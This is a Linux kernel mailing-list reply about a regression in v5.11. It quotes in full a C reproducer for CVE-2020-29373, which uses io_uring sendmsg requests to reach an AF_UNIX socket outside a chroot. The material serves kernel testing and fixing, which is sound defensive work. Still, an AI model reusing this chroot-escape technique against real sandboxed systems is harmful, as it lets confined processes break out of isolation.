Re: CVE-2020-29373 reproducer fails on v5.11

[Pavel Begunkov <asml.silence@gmail.com>]

On 10/02/2021 19:08, Petr Vorel wrote:
> Hi all,
> 
> I found that the reproducer for CVE-2020-29373 from Nicolai Stange (source attached),
> which was backported to LTP as io_uring02 by Martin Doucha [1] is failing since
> 10cad2c40dcb ("io_uring: don't take fs for recvmsg/sendmsg") from v5.11-rc1.

Thanks for letting us know, we need to revert it

> 
> io_uring02 failure:
> io_uring02.c:148: TFAIL: Write outside chroot succeeded.
> 
> The original reproducer (exits with 4) failure:
> error: cqe 255: res=16, but expected -ENOENT
> error: Test failed
> 
> Quoting Nicolai: This is likely to be a real issue with the kernel commit.
> The test tries to do a sendmsg() to an AF_UNIX socket outside
> a chroot. So the res=16 indicates that it was able to look it up and send 16
> bytes to it.
> 
> Then 907d1df30a51 ("io_uring: fix wqe->lock/completion_lock deadlock") from v5.11-rc6 causes
> different errors errors:
> io_uring02.c:161: TFAIL: Write outside chroot result not found
> io_uring02.c:164: TFAIL: Wrong number of entries in completion queue
> 
> According to Nicolai this could be a test bug (test tries to race io_uring into
> processing the sendmsg request asynchronously from a worker thread (where is
> the vulnerability). That was is a needed workaround due missing IOSQE_ASYNC on
> older kernels (< 5.5).
> 
> Tips and comments are welcome.
> 
> Kind regards,
> Petr
> 
> [1] https://github.com/linux-test-project/ltp/tree/master/testcases/kernel/syscalls/io_uring/io_uring02.c
> 
> /*
>  * repro-CVE-2020-29373 -- Reproducer for CVE-2020-29373.
>  *
>  * Copyright (c) 2021 SUSE
>  * Author: Nicolai Stange <nstange@suse.de>
>  *
>  * This program is free software; you can redistribute it and/or
>  * modify it under the terms of the GNU General Public License
>  * as published by the Free Software Foundation; either version 2
>  * of the License, or (at your option) any later version.
>  *
>  * This program is distributed in the hope that it will be useful,
>  * but WITHOUT ANY WARRANTY; without even the implied warranty of
>  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
>  * GNU General Public License for more details.
>  *
>  * You should have received a copy of the GNU General Public License
>  * along with this program; if not, see <http://www.gnu.org/licenses/>.
>  */
> 
> #define _GNU_SOURCE
> #include <unistd.h>
> #include <syscall.h>
> #include <linux/io_uring.h>
> #include <stdio.h>
> #include <sys/mman.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <inttypes.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> 
> static int io_uring_setup(__u32 entries, struct io_uring_params * p)
> {
> 	return (int)syscall(__NR_io_uring_setup, entries, p);
> }
> 
> static int io_uring_enter(unsigned int fd, __u32 to_submit,
> 			  __u32 min_complete, unsigned int flags ,
> 			  sigset_t * sig, size_t sigsz)
> {
> 	return (int)syscall(__NR_io_uring_enter, fd, to_submit,
> 			    min_complete, flags, sig, sigsz);
> }
> 
> /*
>  * This attempts to make the kernel issue a sendmsg() to
>  * path from io_uring's async io_sq_wq_submit_work().
>  *
>  * Unfortunately, IOSQE_ASYNC is available only from kernel version
>  * 5.6 onwards. To still force io_uring to process the request
>  * asynchronously from io_sq_wq_submit_work(), queue a couple of
>  * auxiliary requests all failing with EAGAIN before. This is
>  * implemented by writing repeatedly to an auxiliary O_NONBLOCK
>  * AF_UNIX socketpair with a small SO_SNDBUF.
>  */
> static int try_sendmsg_async(const char * const path)
> {
> 	int r, i, j;
> 
> 	int aux_sock[2];
> 	int snd_sock;
> 	int sockoptval;
> 	char sbuf[16] = { 0 };
> 	struct iovec siov = { .iov_base = &sbuf, .iov_len = sizeof(sbuf) };
> 	struct msghdr aux_msg = {
> 		.msg_name = NULL,
> 		.msg_namelen = 0,
> 		.msg_iov = &siov,
> 		.msg_iovlen = 1,
> 	};
> 	struct sockaddr_un addr = { 0 };
> 	struct msghdr msg = {
> 		.msg_name = &addr,
> 		.msg_namelen = sizeof(addr),
> 		.msg_iov = &siov,
> 		.msg_iovlen = 1,
> 	};
> 
> 	struct io_uring_params iour_params = { 0 };
> 	int iour_fd;
> 	void *iour_sqr_base;
> 	__u32 *iour_sqr_phead;
> 	__u32 *iour_sqr_ptail;
> 	__u32 *iour_sqr_pmask;
> 	__u32 *iour_sqr_parray;
> 	struct io_uring_sqe *iour_sqes;
> 	struct io_uring_sqe *iour_sqe;
> 	void *iour_cqr_base;
> 	__u32 *iour_cqr_phead;
> 	__u32 *iour_cqr_ptail;
> 	__u32 *iour_cqr_pmask;
> 	struct io_uring_cqe *iour_cqr_pcqes;
> 	__u32 iour_sqr_tail;
> 	__u32 iour_cqr_tail;
> 	__u32 n_cqes_seen;
> 
> 	r = socketpair(AF_UNIX, SOCK_DGRAM, 0, aux_sock);
> 	if (r < 0) {
> 		perror("socketpair()");
> 		return 1;
> 	}
> 
> 	sockoptval = 32 + sizeof(sbuf);
> 	r = setsockopt(aux_sock[1], SOL_SOCKET, SO_SNDBUF, &sockoptval,
> 		       sizeof(sockoptval));
> 	if (r < 0) {
> 		perror("setsockopt(SO_SNDBUF)");
> 		goto close_aux_sock;
> 	}
> 
> 	r = fcntl(aux_sock[1], F_SETFL, O_NONBLOCK);
> 	if (r < 0) {
> 		perror("fcntl(F_SETFL, O_NONBLOCK)");
> 		goto close_aux_sock;
> 	}
> 
> 	snd_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
> 	if (snd_sock < 0) {
> 		perror("socket(AF_UNIX)");
> 		r = -1;
> 		goto close_aux_sock;
> 	}
> 
> 	addr.sun_family = AF_UNIX;
> 	strcpy(addr.sun_path, path);
> 
> 	iour_fd = io_uring_setup(512, &iour_params);
> 	if (iour_fd < 0) {
> 		perror("io_uring_setup()");
> 		r = -1;
> 		goto close_socks;
> 	}
> 
> 	iour_sqr_base = mmap(NULL,
> 			     (iour_params.sq_off.array +
> 			      iour_params.sq_entries * sizeof(__u32)),
> 			     PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
> 			     iour_fd, IORING_OFF_SQ_RING);
> 	if (iour_sqr_base == MAP_FAILED) {
> 		perror("mmap(IORING_OFF_SQ_RING)");
> 		r = -1;
> 		goto close_iour;
> 	}
> 
> 	iour_sqr_phead = iour_sqr_base + iour_params.sq_off.head;
> 	iour_sqr_ptail = iour_sqr_base + iour_params.sq_off.tail;
> 	iour_sqr_pmask = iour_sqr_base + iour_params.sq_off.ring_mask;
> 	iour_sqr_parray = iour_sqr_base + iour_params.sq_off.array;
> 
> 	iour_sqes = mmap(NULL,
> 			 iour_params.sq_entries * sizeof(struct io_uring_sqe),
> 			 PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
> 			 iour_fd, IORING_OFF_SQES);
> 	if (iour_sqes == MAP_FAILED) {
> 		perror("mmap(IORING_OFF_SQES)");
> 		r = -1;
> 		goto close_iour;
> 	}
> 
> 	iour_cqr_base =
> 		mmap(NULL,
> 		     (iour_params.cq_off.cqes +
> 		      iour_params.cq_entries * sizeof(struct io_uring_cqe)),
> 		     PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE,
> 		     iour_fd, IORING_OFF_CQ_RING);
> 	if (iour_cqr_base == MAP_FAILED) {
> 		perror("mmap(IORING_OFF_CQ_RING)");
> 		r = -1;
> 		goto close_iour;
> 	}
> 
> 	iour_cqr_phead = iour_cqr_base + iour_params.cq_off.head;
> 	iour_cqr_ptail = iour_cqr_base + iour_params.cq_off.tail;
> 	iour_cqr_pmask = iour_cqr_base + iour_params.cq_off.ring_mask;
> 	iour_cqr_pcqes = iour_cqr_base + iour_params.cq_off.cqes;
> 
> 	/*
> 	 * First add the auxiliary sqes supposed to fail
> 	 * with -EAGAIN ...
> 	 */
> 	iour_sqr_tail = *iour_sqr_ptail;
> 	for (i = 0, j = iour_sqr_tail; i < 255; ++i, ++j) {
> 		iour_sqe = &iour_sqes[i];
> 		*iour_sqe = (struct io_uring_sqe){0};
> 		iour_sqe->opcode = IORING_OP_SENDMSG;
> 		iour_sqe->flags = IOSQE_IO_DRAIN;
> 		iour_sqe->fd = aux_sock[1];
> 		iour_sqe->addr = (__u64)&aux_msg;
> 		iour_sqe->user_data = i;
> 		iour_sqr_parray[j & *iour_sqr_pmask] = i;
> 	}
> 
> 	/*
> 	 * ... followed by the actual one supposed
> 	 * to fail with -ENOENT.
> 	 */
> 	iour_sqe = &iour_sqes[255];
> 	*iour_sqe = (struct io_uring_sqe){0};
> 	iour_sqe->opcode = IORING_OP_SENDMSG;
> 	iour_sqe->flags = IOSQE_IO_DRAIN;
> 	iour_sqe->fd = snd_sock;
> 	iour_sqe->addr = (__u64)&msg;
> 	iour_sqe->user_data = 255;
> 	iour_sqr_parray[j & *iour_sqr_pmask] = 255;
> 
> 	iour_sqr_tail += 256;
> 	__atomic_store(iour_sqr_ptail, &iour_sqr_tail, __ATOMIC_RELEASE);
> 
> 	r = io_uring_enter(iour_fd, 256, 256, IORING_ENTER_GETEVENTS, NULL, 0);
> 	if (r < 0) {
> 		perror("io_uring_enter");
> 		goto close_iour;
> 	}
> 
> 	if (r != 256) {
> 		fprintf(stderr,
> 			"error: io_uring_enter(): unexpected return value\n");
> 		r = 1;
> 		goto close_iour;
> 	}
> 
> 	r = 0;
> 	n_cqes_seen = 0;
> 	__atomic_load(iour_cqr_ptail, &iour_cqr_tail, __ATOMIC_ACQUIRE);
> 	for(i = *iour_cqr_phead; i != iour_cqr_tail; ++i) {
> 		const struct io_uring_cqe *cqe;
> 
> 		cqe = &iour_cqr_pcqes[i & *iour_cqr_pmask];
> 		++n_cqes_seen;
> 
> 		if (cqe->user_data != 255) {
> 			if (cqe->res < 0 && cqe->res != -EAGAIN) {
> 				r = r < 2 ? 2 : r;
> 				fprintf(stderr,
> 					"error: cqe %" PRIu64 ": res=%" PRId32 "\n",
> 					cqe->user_data, cqe->res);
> 			}
> 		} else if (cqe->res != -ENOENT) {
> 			r = 3;
> 			fprintf(stderr,
> 				"error: cqe %" PRIu64 ": res=%" PRId32 ", but expected -ENOENT\n",
> 				cqe->user_data, cqe->res);
> 		}
> 	}
> 	__atomic_store(iour_cqr_ptail, &iour_cqr_tail, __ATOMIC_RELEASE);
> 
> 	if (n_cqes_seen != 256) {
> 		fprintf(stderr, "error: unexpected number of io_uring cqes\n");
> 		r = 4;
> 	}
> 
> close_iour:
> 	close(iour_fd);
> close_socks:
> 	close(snd_sock);
> close_aux_sock:
> 	close(aux_sock[0]);
> 	close(aux_sock[1]);
> 
> 	return r;
> }
> 
> 
> int main(int argc, char *argv[])
> {
> 	int r;
> 	char tmpdir[] = "/tmp/tmp.XXXXXX";
> 	int rcv_sock;
> 	struct sockaddr_un addr = { 0 };
> 	pid_t c;
> 	int wstatus;
> 
> 	if (!mkdtemp(tmpdir)) {
> 		perror("mkdtemp()");
> 		return 1;
> 	}
> 
> 	rcv_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
> 	if (rcv_sock < 0) {
> 		perror("socket(AF_UNIX)");
> 		r = 1;
> 		goto rmtmpdir;
> 	}
> 
> 	addr.sun_family = AF_UNIX;
> 	snprintf(addr.sun_path, sizeof(addr.sun_path), "%s/sock", tmpdir);
> 
> 	r = bind(rcv_sock, (struct sockaddr *)&addr,
> 		 sizeof(addr));
> 	if (r < 0) {
> 		perror("bind()");
> 		close(rcv_sock);
> 		r = 1;
> 		goto rmtmpdir;
> 	}
> 
> 	c = fork();
> 	if (!c) {
> 		close(rcv_sock);
> 
> 		if (chroot(tmpdir)) {
> 			perror("chroot()");
> 			return 1;
> 		}
> 
> 		r = try_sendmsg_async(addr.sun_path);
> 		if (r < 0) {
> 			/* system call failure */
> 			r = 1;
> 		} else if (r) {
> 			/* test case failure */
> 			r += 1;
> 		}
> 
> 		return r;
> 	}
> 
> 	if (waitpid(c, &wstatus, 0) == (pid_t)-1) {
> 		perror("waitpid()");
> 		r = 1;
> 		goto rmsock;
> 	}
> 
> 	if (!WIFEXITED(wstatus)) {
> 		fprintf(stderr, "child got terminated\n");
> 		r = 1;
> 		goto rmsock;
> 	}
> 
> 	r = WEXITSTATUS(wstatus);
> 	if (r > 1)
> 		fprintf(stderr, "error: Test failed\n");
> 
> rmsock:
> 	close(rcv_sock);
> 	unlink(addr.sun_path);
> 
> rmtmpdir:
> 	rmdir(tmpdir);
> 
> 	return r;
> }
> 

-- 
Pavel Begunkov